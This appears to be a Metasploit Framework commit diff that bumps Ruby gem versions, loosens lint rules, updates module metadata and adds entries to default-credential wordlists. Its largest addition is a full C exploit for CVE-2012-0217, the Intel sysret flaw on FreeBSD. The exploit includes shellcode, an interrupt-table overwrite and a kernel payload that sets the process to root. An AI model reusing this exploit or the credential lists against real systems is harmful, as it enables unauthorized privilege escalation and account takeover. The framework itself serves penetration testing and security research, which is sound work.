automatic module_metadata_base.json update

Land #11466 , Add Jenkins ACL bypass and metaprogramming RCE
Land #11573 , Windows 2019 support in Windows::Priv
2019-03-18 05:39:14 -07:00 · 2019-03-18 05:24:33 -07:00 · 2019-03-17 10:16:45 -07:00 · 2019-03-17 10:16:45 -07:00 · 2019-03-16 16:52:33 -07:00 · 2019-03-15 11:32:53 -07:00
102 changed files with 6081 additions and 492 deletions
@@ -9,7 +9,7 @@
 # inherit_from: .rubocop_todo.yml

 AllCops:
-  TargetRubyVersion: 2.2
+  TargetRubyVersion: 2.4

 Metrics/ClassLength:
  Description: 'Most Metasploit modules are quite large. This is ok.'
@@ -45,6 +45,10 @@ Style/RedundantReturn:
  Description: 'This often looks weird when mixed with actual returns, and hurts nothing'
  Enabled: false

+Naming/VariableNumber:
+  Description: 'To make it easier to use reference code, disable this cop'
+  Enabled: false
+
 Style/NumericPredicate:
  Description: 'This adds no efficiency nor space saving'
  Enabled: false
@@ -55,14 +59,18 @@ Style/Documentation:
  Exclude:
    - 'modules/**/*'

-Layout/IndentHeredoc:
+Layout/SpaceInsideArrayLiteralBrackets:
  Enabled: false
-  Description: 'We need to leave this disabled for Ruby 2.2 compat, remove in 2018'
+  Description: 'Almost all module metadata have space in brackets'

 Style/GuardClause:
  Enabled: false
  Description: 'This often introduces bugs in tested code'

+Style/EmptyLiteral:
+  Enabled: false
+  Description: 'This looks awkward when you mix empty and non-empty literals'
+
 Style/NegatedIf:
  Enabled: false
  Description: 'This often introduces bugs in tested code'
@@ -72,9 +80,16 @@ Style/ConditionalAssignment:
  Description: 'This is confusing for folks coming from other languages'

 Style/Encoding:
-  Enabled: true
  Description: 'We prefer binary to UTF-8.'
-  EnforcedStyle: 'when_needed'
+  Enabled: false
+
+Style/ParenthesesAroundCondition:
+  Enabled: false
+  Description: 'This is used in too many places to discount, especially in ported code. Has little effect'
+
+Style/TrailingCommaInArrayLiteral:
+  Enabled: false
+  Description: 'This is often a useful pattern, and is actually required by other languages. It does not hurt.'

 Metrics/LineLength:
  Description: >-
@@ -83,6 +98,13 @@ Metrics/LineLength:
  Enabled: true
  Max: 180

+Metrics/BlockLength:
+  Enabled: true
+  Description: >-
+                  While the style guide suggests 10 lines, exploit definitions
+                  often exceed 200 lines.
+  Max: 300
+
 Metrics/MethodLength:
  Enabled: true
  Description: >-
@@ -90,10 +112,10 @@ Metrics/MethodLength:
                  often exceed 200 lines.
  Max: 300

-# Basically everything in metasploit needs binary encoding, not UTF-8.
-# Disable this here and enforce it through msftidy
-Style/Encoding:
-  Enabled: false
+Naming/UncommunicativeMethodParamName:
+  Enabled: true
+  Description: 'Whoever made this requirement never looked at crypto methods, IV'
+  MinNameLength: 2

 # %q() is super useful for long strings split over multiple lines and
 # is very common in module constructors for things like descriptions
@@ -104,11 +126,31 @@ Style/NumericLiterals:
  Enabled: false
  Description: 'This often hurts readability for exploit-ish code.'

+Layout/AlignHash:
+  Enabled: false
+  Description: 'aligning info hashes to match these rules is almost impossible to get right'
+
+Layout/EmptyLines:
+  Enabled: false
+  Description: 'these are used to increase readability'
+
+Layout/EmptyLinesAroundClassBody:
+  Enabled: false
+  Description: 'these are used to increase readability'
+
+Layout/EmptyLinesAroundMethodBody:
+  Enabled: false
+  Description: 'these are used to increase readability'
+
 Layout/AlignParameters:
  Enabled: true
  EnforcedStyle: 'with_fixed_indentation'
  Description: 'initialize method of every module has fixed indentation for Name, Description, etc'

+Style/For:
+  Enabled: false
+  Description: 'if a module is written with a for loop, it cannot always be logically replaced with each'
+
 Style/StringLiterals:
  Enabled: false
  Description: 'Single vs double quote fights are largely unproductive.'
@@ -29,7 +29,6 @@ RUN apk add --no-cache \
      git \
    && echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
    && gem update --system \
-    && gem install bundler \
    && bundle install --clean --no-cache --system $BUNDLER_ARGS \
    # temp fix for https://github.com/bundler/bundler/issues/6680
    && rm -rf /usr/local/bundle/cache \
@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (4.17.42)
+    metasploit-framework (4.17.47)
      actionpack (~> 4.2.6)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
@@ -76,27 +76,27 @@ GEM
  remote: https://rubygems.org/
  specs:
    Ascii85 (1.0.3)
-    actionpack (4.2.11)
-      actionview (= 4.2.11)
-      activesupport (= 4.2.11)
+    actionpack (4.2.11.1)
+      actionview (= 4.2.11.1)
+      activesupport (= 4.2.11.1)
      rack (~> 1.6)
      rack-test (~> 0.6.2)
      rails-dom-testing (~> 1.0, >= 1.0.5)
      rails-html-sanitizer (~> 1.0, >= 1.0.2)
-    actionview (4.2.11)
-      activesupport (= 4.2.11)
+    actionview (4.2.11.1)
+      activesupport (= 4.2.11.1)
      builder (~> 3.1)
      erubis (~> 2.7.0)
      rails-dom-testing (~> 1.0, >= 1.0.5)
      rails-html-sanitizer (~> 1.0, >= 1.0.3)
-    activemodel (4.2.11)
-      activesupport (= 4.2.11)
+    activemodel (4.2.11.1)
+      activesupport (= 4.2.11.1)
      builder (~> 3.1)
-    activerecord (4.2.11)
-      activemodel (= 4.2.11)
-      activesupport (= 4.2.11)
+    activerecord (4.2.11.1)
+      activemodel (= 4.2.11.1)
+      activesupport (= 4.2.11.1)
      arel (~> 6.0)
-    activesupport (4.2.11)
+    activesupport (4.2.11.1)
      i18n (~> 0.7)
      minitest (~> 5.1)
      thread_safe (~> 0.3, >= 0.3.4)
@@ -107,7 +107,7 @@ GEM
    arel (6.0.4)
    arel-helpers (2.8.0)
      activerecord (>= 3.1.0, < 6)
-    backports (3.11.4)
+    backports (3.12.0)
    bcrypt (3.1.12)
    bcrypt_pbkdf (1.0.0)
    bindata (2.4.4)
@@ -138,7 +138,7 @@ GEM
      concurrent-ruby (~> 1.0)
    jsobfu (0.4.2)
      rkelly-remix
-    json (2.1.0)
+    json (2.2.0)
    loofah (2.2.3)
      crass (~> 1.0.2)
      nokogiri (>= 1.5.9)
@@ -176,10 +176,10 @@ GEM
    mini_portile2 (2.4.0)
    minitest (5.11.3)
    mqtt (0.5.0)
-    msgpack (1.2.6)
+    msgpack (1.2.9)
    multipart-post (2.0.0)
    nessus_rest (0.1.6)
-    net-ssh (5.1.0)
+    net-ssh (5.2.0)
    network_interface (0.0.2)
    nexpose (7.2.1)
    nokogiri (1.10.1)
@@ -219,14 +219,14 @@ GEM
      rails-deprecated_sanitizer (>= 1.0.1)
    rails-html-sanitizer (1.0.4)
      loofah (~> 2.2, >= 2.2.2)
-    railties (4.2.11)
-      actionpack (= 4.2.11)
-      activesupport (= 4.2.11)
+    railties (4.2.11.1)
+      actionpack (= 4.2.11.1)
+      activesupport (= 4.2.11.1)
      rake (>= 0.8.7)
      thor (>= 0.18.1, < 2.0)
    rake (12.3.2)
    rb-readline (0.5.5)
-    recog (2.1.46)
+    recog (2.2.1)
      nokogiri
    redcarpet (3.4.0)
    rex-arch (0.1.13)
@@ -265,7 +265,7 @@ GEM
      metasm
      rex-core
      rex-text
-    rex-socket (0.1.16)
+    rex-socket (0.1.17)
      rex-core
    rex-sslscan (0.1.5)
      rex-core
@@ -299,7 +299,7 @@ GEM
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
    rspec-support (3.8.0)
-    ruby-macho (2.1.0)
+    ruby-macho (2.2.0)
    ruby-rc4 (0.1.5)
    ruby_smb (1.0.5)
      bindata
@@ -1,15 +1,15 @@
 This file is auto-generated by tools/dev/update_gem_licenses.sh
 Ascii85, 1.0.3, MIT
-actionpack, 4.2.11, MIT
-actionview, 4.2.11, MIT
-activemodel, 4.2.11, MIT
-activerecord, 4.2.11, MIT
-activesupport, 4.2.11, MIT
+actionpack, 4.2.11.1, MIT
+actionview, 4.2.11.1, MIT
+activemodel, 4.2.11.1, MIT
+activerecord, 4.2.11.1, MIT
+activesupport, 4.2.11.1, MIT
 addressable, 2.5.2, "Apache 2.0"
 afm, 0.2.2, MIT
 arel, 6.0.4, MIT
 arel-helpers, 2.8.0, MIT
-backports, 3.11.4, MIT
+backports, 3.12.0, MIT
 bcrypt, 3.1.12, MIT
 bcrypt_pbkdf, 1.0.0, MIT
 bindata, 2.4.4, ruby
@@ -33,12 +33,12 @@ fivemat, 1.3.7, MIT
 hashery, 2.1.2, "Simplified BSD"
 i18n, 0.9.5, MIT
 jsobfu, 0.4.2, "New BSD"
-json, 2.1.0, ruby
+json, 2.2.0, ruby
 loofah, 2.2.3, MIT
 metasm, 1.0.3, LGPL
 metasploit-concern, 2.0.5, "New BSD"
 metasploit-credential, 2.0.14, "New BSD"
-metasploit-framework, 4.17.42, "New BSD"
+metasploit-framework, 4.17.47, "New BSD"
 metasploit-model, 2.0.4, "New BSD"
 metasploit-payloads, 1.3.62, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 2.0.17, "New BSD"
@@ -47,10 +47,10 @@ method_source, 0.9.2, MIT
 mini_portile2, 2.4.0, MIT
 minitest, 5.11.3, MIT
 mqtt, 0.5.0, MIT
-msgpack, 1.2.6, "Apache 2.0"
+msgpack, 1.2.9, "Apache 2.0"
 multipart-post, 2.0.0, MIT
 nessus_rest, 0.1.6, MIT
-net-ssh, 5.1.0, MIT
+net-ssh, 5.2.0, MIT
 network_interface, 0.0.2, MIT
 nexpose, 7.2.1, "New BSD"
 nokogiri, 1.10.1, MIT
@@ -71,10 +71,10 @@ rack-test, 0.6.3, MIT
 rails-deprecated_sanitizer, 1.0.3, MIT
 rails-dom-testing, 1.0.9, MIT
 rails-html-sanitizer, 1.0.4, MIT
-railties, 4.2.11, MIT
+railties, 4.2.11.1, MIT
 rake, 12.3.2, MIT
 rb-readline, 0.5.5, BSD
-recog, 2.1.46, unknown
+recog, 2.2.1, unknown
 redcarpet, 3.4.0, MIT
 rex-arch, 0.1.13, "New BSD"
 rex-bin_tools, 0.1.6, "New BSD"
@@ -89,7 +89,7 @@ rex-powershell, 0.1.79, "New BSD"
 rex-random_identifier, 0.1.4, "New BSD"
 rex-registry, 0.1.3, "New BSD"
 rex-rop_builder, 0.1.3, "New BSD"
-rex-socket, 0.1.16, "New BSD"
+rex-socket, 0.1.17, "New BSD"
 rex-sslscan, 0.1.5, "New BSD"
 rex-struct2, 0.1.2, "New BSD"
 rex-text, 0.2.21, "New BSD"
@@ -102,7 +102,7 @@ rspec-mocks, 3.8.0, MIT
 rspec-rails, 3.8.2, MIT
 rspec-rerun, 1.1.0, MIT
 rspec-support, 3.8.0, MIT
-ruby-macho, 2.1.0, MIT
+ruby-macho, 2.2.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby_smb, 1.0.5, "New BSD"
 rubyntlm, 0.6.2, MIT
@@ -31,7 +31,6 @@ Vagrant.configure(2) do |config|
  [ "gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3",
    "curl -L https://get.rvm.io | bash -s stable",
    "source ~/.rvm/scripts/rvm && cd /vagrant && rvm install `cat .ruby-version`",
-    "source ~/.rvm/scripts/rvm && cd /vagrant && gem install bundler",
    "source ~/.rvm/scripts/rvm && cd /vagrant && bundle",
    "mkdir -p ~/.msf4",
  ].each do |step|
@@ -24,9 +24,12 @@ end

 begin
  require 'bundler/setup'
-rescue LoadError
-  $stderr.puts "[*] Metasploit requires the Bundler gem to be installed"
-  $stderr.puts "    $ gem install bundler"
+rescue LoadError => e
+  $stderr.puts "[*] Bundler failed to load and returned this error:"
+  $stderr.puts
+  $stderr.puts "   '#{e}'"
+  $stderr.puts
+  $stderr.puts "[*] You may need to uninstall or upgrade bundler"
  exit(1)
 end

@@ -0,0 +1,345 @@
+// CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)
+// Copyright 2012 all right reserved, not for commercial uses, bitches
+// Infringement Punishment: Monkeys coming out of your ass Bruce Almighty style.
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdint.h>
+#include <unistd.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/utsname.h>
+#include <machine/cpufunc.h>
+#define _WANT_UCRED
+#include <sys/proc.h>
+#include <machine/segments.h>
+#include <sys/param.h>
+#include <sys/linker.h>
+
+uintptr_t Xofl_ptr, Xbnd_ptr, Xill_ptr, Xdna_ptr, Xpage_ptr, Xfpu_ptr, Xalign_ptr, Xmchk_ptr, Xxmm_ptr;
+
+struct gate_descriptor * sidt()
+{
+	struct region_descriptor idt;
+
+	asm ("sidt %0": "=m"(idt));
+
+	return (struct gate_descriptor*)idt.rd_base;
+} 
+
+u_long get_symaddr(char *symname)
+{
+	struct kld_sym_lookup ksym;
+
+	ksym.version = sizeof (ksym);
+	ksym.symname = symname;
+
+	if (kldsym(0, KLDSYM_LOOKUP, &ksym) < 0) {
+		perror("kldsym");
+		exit(1);
+	}
+	printf("    [+] Resolved %s to %#lx\n", ksym.symname, ksym.symvalue);
+	return ksym.symvalue;
+}
+
+// Code taken from amd64/amd64/machdep.c
+void setidt(struct gate_descriptor *idt, int idx, uintptr_t func, int typ, int dpl, int ist)
+{
+	struct gate_descriptor *ip;
+
+	ip = idt + idx;
+	ip->gd_looffset = func;
+	ip->gd_selector = GSEL(GCODE_SEL, SEL_KPL);
+	ip->gd_ist = ist;
+	ip->gd_xx = 0;
+	ip->gd_type = typ;
+	ip->gd_dpl = dpl;
+	ip->gd_p = 1;
+	ip->gd_hioffset = func>>16;
+}
+
+void shellcode()
+{
+	// Actually we dont really need to spawn a shell since we
+	// changed our whole cred struct.
+	// Just exit...
+	printf("[*] Got root!\n");
+	exit(0);
+}
+
+void kernelmodepayload()
+{
+	struct thread *td;
+	struct ucred *cred;
+
+	// We need to restore/recover whatever we smashed
+	// We inititalized rsp to idt[14] + 10*8, i.e. idt[19] (see trigger())
+	// The #GP exception frame writes 6*64bit registers, i.e. it overwrites
+	// idt[18], idt[17] and idt[16]
+	// thus overall we have:
+	// - idt[18], idt[17] and idt[16] are trashed
+	// - tf_addr -> overwrites the 64bit-LSB of idt[15]
+	// - tf_trapno -> overwrites Target Offset[63:32] of idt[14]
+	// - rdi -> overwrites the 64bit-LSB of idt[7]
+	// - #PF exception frame overwrites idt[6], idt[5] and idt[4]
+	struct gate_descriptor *idt = sidt();
+	setidt(idt, IDT_OF, Xofl_ptr, SDT_SYSIGT, SEL_KPL, 0); // 4
+	setidt(idt, IDT_BR, Xbnd_ptr, SDT_SYSIGT, SEL_KPL, 0); // 5
+	setidt(idt, IDT_UD, Xill_ptr, SDT_SYSIGT, SEL_KPL, 0); // 6
+	setidt(idt, IDT_NM, Xdna_ptr, SDT_SYSIGT, SEL_KPL, 0); // 7
+	setidt(idt, IDT_PF, Xpage_ptr, SDT_SYSIGT, SEL_KPL, 0); // 14
+	setidt(idt, IDT_MF, Xfpu_ptr, SDT_SYSIGT, SEL_KPL, 0); // 15
+	setidt(idt, IDT_AC, Xalign_ptr, SDT_SYSIGT, SEL_KPL, 0); // 16
+	setidt(idt, IDT_MC, Xmchk_ptr, SDT_SYSIGT, SEL_KPL, 0); // 17
+	setidt(idt, IDT_XF, Xxmm_ptr, SDT_SYSIGT, SEL_KPL, 0); // 18
+
+	// get the thread pointer
+	asm ("mov %%gs:0, %0" : "=r"(td));
+
+	// The Dark Knight Rises
+	cred = td->td_proc->p_ucred;
+	cred->cr_uid = cred->cr_ruid = cred->cr_rgid = 0;
+	cred->cr_groups[0] = 0;
+
+	// return to user mode to spawn the shell
+	asm ("swapgs; sysretq;" :: "c"(shellcode)); // store the shellcode addr to rcx
+}
+
+#define TRIGGERCODESIZE 20
+#define TRAMPOLINECODESIZE 18
+
+void trigger()
+{
+	printf("[*] Setup...\n");
+	// Allocate one page just before the non-canonical address
+	printf("    [+] Trigger code...\n");
+	uint64_t pagesize = getpagesize();
+	uint8_t * area = (uint8_t*)((1ULL << 47) - pagesize);
+	area = mmap(area, pagesize,
+		PROT_READ | PROT_WRITE | PROT_EXEC,
+		MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0);
+	if (area == MAP_FAILED) {
+		perror("mmap (trigger)");
+		exit(1);
+	}
+
+	// Copy the trigger code at the end of the page
+	// such that the syscall instruction is at its
+	// boundary
+	char triggercode[] =
+		"\xb8\x18\x00\x00\x00" // mov rax, 24; #getuid
+		"\x48\x89\xe3" // mov rbx, rsp; save the user's stack for later
+		"\x48\xbc\xbe\xba\xfe\xca\xde\xc0\xad\xde" // mov rsp, 0xdeadc0decafebabe
+		"\x0f\x05"; // syscall
+
+	uint8_t * trigger_addr = area + pagesize - TRIGGERCODESIZE;
+	memcpy(trigger_addr, triggercode, TRIGGERCODESIZE);
+
+	// There are two outcomes given a target rsp:
+	// - if rsp can't be written to, a double fault is triggered
+	//   (Xdblfault defined in sys/amd64/amd64/exception.S)
+	//   and the exception frame is pushed to a special stack
+	// - otherwise a #GP is triggered
+	//	 (Xprot defined in sys/amd64/amd64/exception.S)
+	//   and the exception frame is pushed to [rsp]
+	//
+	// In the latter case, trouble is... #GP triggers a page fault
+	// (Xpage):
+	//  IDTVEC(prot)
+	//  	subq	$TF_ERR,%rsp
+	//  [1]	movl	$T_PROTFLT,TF_TRAPNO(%rsp)
+	//  [2]	movq	$0,TF_ADDR(%rsp)
+	//  [3]	movq	%rdi,TF_RDI(%rsp)	/* free up a GP register */
+	//  	leaq	doreti_iret(%rip),%rdi
+	//  	cmpq	%rdi,TF_RIP(%rsp)
+	//  	je	1f			/* kernel but with user gsbase!! */
+	//  [4]	testb	$SEL_RPL_MASK,TF_CS(%rsp) /* Did we come from kernel? */
+	//  	jz	2f			/* already running with kernel GS.base */
+	//  1:	swapgs
+	//  2:	movq	PCPU(CURPCB),%rdi [5]
+	//
+	// [4] sets the Z flag because we come from the kernel (while executing sysret)
+	// and we therefore skip swapgs. But GS is in fact the user GS.base! Indeed
+	// it was restored just before calling sysret...
+	// Thus, [5] triggers a pagefault while trying to access gs:data
+	// If we don't do anything we'll eventually doublefault, tripplefault etc. and crash
+	//
+	// We therefore need a way: (1) to recover from the GP, (2) to clean
+	// any mess we did. Both could be solved if we can get get an arbitrary
+	// code execution by the time we reach [5] (NB: this is not mandatory, we could
+	// get the code execution later down the fault trigger chain)
+	//
+	// So... here is the idea: wouldn't it be nice if we could overwrite the
+	// page fault handler's address and therefore get code execution when [5]
+	// triggers the #PF?
+	//
+	// For reference:
+	// Gate descriptor:
+	// +0: Target Offset[15:0] | Target Selector
+	// +4: Some stuff | Target Offset[31:16]
+	// +8: Target Offset[63:32]
+	// +12: Stuff
+	//
+	// and from include/frame.h:
+	//  struct trapframe {
+	//  	register_t	tf_rdi;
+	//  	register_t	tf_rsi;
+	//  	register_t	tf_rdx;
+	//  	register_t	tf_rcx;
+	//  	register_t	tf_r8;
+	//  	register_t	tf_r9;
+	//  	register_t	tf_rax;
+	//  	register_t	tf_rbx;
+	//  	register_t	tf_rbp;
+	//  	register_t	tf_r10;
+	//  	register_t	tf_r11;
+	//  	register_t	tf_r12;
+	//  	register_t	tf_r13;
+	//  	register_t	tf_r14;
+	//  	register_t	tf_r15;
+	//  	uint32_t	tf_trapno;
+	//  	uint16_t	tf_fs;
+	//  	uint16_t	tf_gs;
+	//  	register_t	tf_addr;
+	//  	uint32_t	tf_flags;
+	//  	uint16_t	tf_es;
+	//  	uint16_t	tf_ds;
+	//  	/* below portion defined in hardware */
+	//  	register_t	tf_err;
+	//  	register_t	tf_rip;
+	//  	register_t	tf_cs;
+	//  	register_t	tf_rflags;
+	//  	register_t	tf_rsp;
+	//  	register_t	tf_ss;
+	//  };
+	//
+	// When the exception is triggered, the hardware pushes
+	// ss, rsp, rflags, cs, rip and err
+	//
+	// We can see that [1], [2] and [3] write to the stack
+	// [3] is fully user-controlled through rdi, so we could try to align
+	// rsp such that [3] overwrites the offset address
+	//
+	// The trouble is... rsp is 16byte aligned for exceptions. We can
+	// therefore only overwrite the first 32-LSB of the offset address
+	// (check how rdi is 16byte aligned in this trapframe)
+	//
+	// [2] writes 0 to tf_addr which is also 16byte aligned. So no dice.
+	// That leaves us with [1] which writes T_PROTFLT (0x9) to tf_trapno
+	// and tf_trapno is 16byte aligned + 8!
+	// This enables us to set Target Offset[63:32] to 0x9
+	//
+	// We set rsp to &idt[14] + 10 * 8 (to align tf_trapno with Offset[63:32])
+	*(uint64_t*)(trigger_addr + 10) = (uint64_t)(((uint8_t*)&sidt()[14]) + 10 * 8);
+	// Hence, the #PF handler's address is now 0x9WWXXYYZZ
+	// Furthermore, WWXXYYZZ is known since we can get (see get_symaddr()) the #PF's address
+	// Thus, the idea is to setup a trampoline code at 0x9WWXXYYZZ which does
+	// some setup and jump to our kernel mode code
+	printf("    [+] Trampoline code...\n");
+	char trampolinecode[] =
+		"\x0f\x01\xf8" // swapgs; switch back to the kernel's GS.base
+		"\x48\x89\xdc" // mov rsp, rbx; restore rsp, it's enough to use the user's stack
+		"\x48\xb8\xbe\xba\xfe\xca\xde\xc0\xad\xde" // mov rax, 0xdeadc0decafebabe
+		"\xff\xe0"; // jmp rax
+
+	uint8_t * trampoline = (uint8_t*)(0x900000000 | (Xpage_ptr & 0xFFFFFFFF));
+	size_t trampoline_allocsize = pagesize;
+	// We round the address to the PAGESIZE for the allocation
+	// Not enough space for the trampoline code ?
+	if ((uint8_t*)((uint64_t)trampoline & ~(pagesize-1)) + pagesize < trampoline + TRAMPOLINECODESIZE)
+		trampoline_allocsize += pagesize;
+	if (mmap((void*)((uint64_t)trampoline & ~(pagesize-1)), trampoline_allocsize,
+		PROT_READ | PROT_WRITE | PROT_EXEC,
+		MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0) == MAP_FAILED)
+	{
+		perror("mmap (trampoline)");
+		exit(1);
+	}
+	memcpy(trampoline, trampolinecode, TRAMPOLINECODESIZE);
+	*(uint64_t*)(trampoline + 8) = (uint64_t)kernelmodepayload;
+	// Call it
+	printf("[*] Fire in the hole!\n");
+	((void (*)())trigger_addr)();
+}
+
+typedef struct validtarget
+{
+	char * sysname;
+	char * release;
+	char * machine;
+} validtarget_t;
+
+int validate_target(char * sysname, char * release, char * machine)
+{
+	validtarget_t targets[] = {
+		{ "FreeBSD", "8.3-RELEASE", "amd64" },
+		{ "FreeBSD", "9.0-RELEASE", "amd64" },
+		{ 0, 0, 0 }
+	};
+
+	int found = 0;
+	int i = 0;
+
+	while (!found && targets[i].sysname) {
+		found = !strcmp(targets[i].sysname, sysname)
+			&& !strcmp(targets[i].release, release)
+			&& !strcmp(targets[i].machine, machine);
+		++i;
+	}
+	return found;
+}
+
+void get_cpu_vendor(char * cpu_vendor)
+{
+	u_int regs[4];
+
+	do_cpuid(0, regs);
+   ((u_int *)cpu_vendor)[0] = regs[1];
+   ((u_int *)cpu_vendor)[1] = regs[3];
+   ((u_int *)cpu_vendor)[2] = regs[2];
+   cpu_vendor[12] = '\0';
+}
+
+int is_intel()
+{
+	char cpu_vendor[13];
+
+	get_cpu_vendor(cpu_vendor);
+	return !strcmp(cpu_vendor, "GenuineIntel");
+}
+
+int main(int argc, char *argv[])
+{
+	printf("CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)\n\n");
+
+	printf("[*] Retrieving host information...\n");
+	char cpu_vendor[13];
+	get_cpu_vendor(cpu_vendor);
+	struct utsname ver;
+	uname(&ver);
+	printf("    [+] CPU: %s\n", cpu_vendor);
+	printf("    [+] sysname: %s\n", ver.sysname);
+	printf("    [+] release: %s\n", ver.release);
+	printf("    [+] version: %s\n", ver.version);
+	printf("    [+] machine: %s\n", ver.machine);
+	printf("[*] Validating target OS and version...\n");
+	if (!is_intel() || !validate_target(ver.sysname, ver.release, ver.machine)) {
+		printf("    [+] NOT Vulnerable :-(\n");
+		exit(1);
+	} else
+		printf("    [+] Vulnerable :-)\n");
+	// Prepare the values we'll need to restore the kernel to a stable state
+	printf("[*] Resolving kernel addresses...\n");
+	Xofl_ptr = (uintptr_t)get_symaddr("Xofl");
+	Xbnd_ptr = (uintptr_t)get_symaddr("Xbnd");
+	Xill_ptr = (uintptr_t)get_symaddr("Xill");
+	Xdna_ptr = (uintptr_t)get_symaddr("Xdna");
+	Xpage_ptr = (uintptr_t)get_symaddr("Xpage");
+	Xfpu_ptr = (uintptr_t)get_symaddr("Xfpu");
+	Xalign_ptr = (uintptr_t)get_symaddr("Xalign");
+	Xmchk_ptr = (uintptr_t)get_symaddr("Xmchk");
+	Xxmm_ptr = (uintptr_t)get_symaddr("Xxmm");
+	// doeet!
+	trigger();
+	return 0;
+}
+
@@ -405,6 +405,7 @@ root realtek
 root root
 root tini
 root tslinux
+root ubnt
 root user
 root vizxv
 root wyse
@@ -44,7 +44,7 @@ apc
 bintec
 blue
 c
-cable-d
+cable-docsis
 canon_admin
 cc
 cisco
@@ -4053,7 +4053,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 04:43:37 +0000",
    "path": "/modules/auxiliary/admin/misc/wol.rb",
    "is_install_path": true,
    "ref_name": "admin/misc/wol",
@@ -6138,7 +6138,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2019-01-09 06:32:22 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/admin/smb/ms17_010_command.rb",
    "is_install_path": true,
    "ref_name": "admin/smb/ms17_010_command",
@@ -6183,7 +6183,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2019-01-09 06:32:22 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/admin/smb/psexec_command.rb",
    "is_install_path": true,
    "ref_name": "admin/smb/psexec_command",
@@ -7006,7 +7006,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2019-02-12 13:29:52 +0000",
+    "mod_time": "2019-03-04 19:25:56 +0000",
    "path": "/modules/auxiliary/admin/wemo/crockpot.rb",
    "is_install_path": true,
    "ref_name": "admin/wemo/crockpot",
@@ -7387,7 +7387,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-08-24 21:38:44 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/bnat/bnat_scan.rb",
    "is_install_path": true,
    "ref_name": "bnat/bnat_scan",
@@ -7810,7 +7810,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb",
    "is_install_path": true,
    "ref_name": "dos/dhcp/isc_dhcpd_clientid",
@@ -8645,7 +8645,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2018-11-18 12:40:09 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb",
    "is_install_path": true,
    "ref_name": "dos/http/ms15_034_ulonglongadd",
@@ -9990,7 +9990,7 @@
    ],
    "platform": "",
    "arch": "",
-    "rport": null,
+    "rport": 80,
    "autofilter_ports": [

    ],
@@ -9998,7 +9998,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-08-24 21:38:44 +0000",
+    "mod_time": "2019-03-06 17:42:27 +0000",
    "path": "/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb",
    "is_install_path": true,
    "ref_name": "dos/ssl/dtls_changecipherspec",
@@ -11853,7 +11853,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:38:51 +0000",
    "path": "/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb",
    "is_install_path": true,
    "ref_name": "fuzzers/ftp/ftp_pre_post",
@@ -13414,7 +13414,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 04:43:03 +0000",
    "path": "/modules/auxiliary/gather/corpwatch_lookup_id.rb",
    "is_install_path": true,
    "ref_name": "gather/corpwatch_lookup_id",
@@ -13456,7 +13456,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-08-26 08:43:10 +0000",
+    "mod_time": "2019-03-05 04:43:03 +0000",
    "path": "/modules/auxiliary/gather/corpwatch_lookup_name.rb",
    "is_install_path": true,
    "ref_name": "gather/corpwatch_lookup_name",
@@ -14148,7 +14148,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2019-01-10 19:19:14 +0000",
+    "mod_time": "2019-03-05 04:43:03 +0000",
    "path": "/modules/auxiliary/gather/http_pdf_authors.rb",
    "is_install_path": true,
    "ref_name": "gather/http_pdf_authors",
@@ -15551,7 +15551,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2018-09-17 16:58:57 +0000",
+    "mod_time": "2019-03-05 04:43:03 +0000",
    "path": "/modules/auxiliary/gather/searchengine_subdomains_collector.rb",
    "is_install_path": true,
    "ref_name": "gather/searchengine_subdomains_collector",
@@ -15584,7 +15584,7 @@

    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-03-05 03:41:41 +0000",
    "path": "/modules/auxiliary/gather/shodan_honeyscore.rb",
    "is_install_path": true,
    "ref_name": "gather/shodan_honeyscore",
@@ -15612,22 +15612,13 @@
    "arch": "",
    "rport": null,
    "autofilter_ports": [
-      80,
-      8080,
-      443,
-      8000,
-      8888,
-      8880,
-      8008,
-      3000,
-      8443
+
    ],
    "autofilter_services": [
-      "http",
-      "https"
+
    ],
    "targets": null,
-    "mod_time": "2017-08-26 21:01:10 +0000",
+    "mod_time": "2019-03-05 03:41:41 +0000",
    "path": "/modules/auxiliary/gather/shodan_search.rb",
    "is_install_path": true,
    "ref_name": "gather/shodan_search",
@@ -15898,7 +15889,7 @@
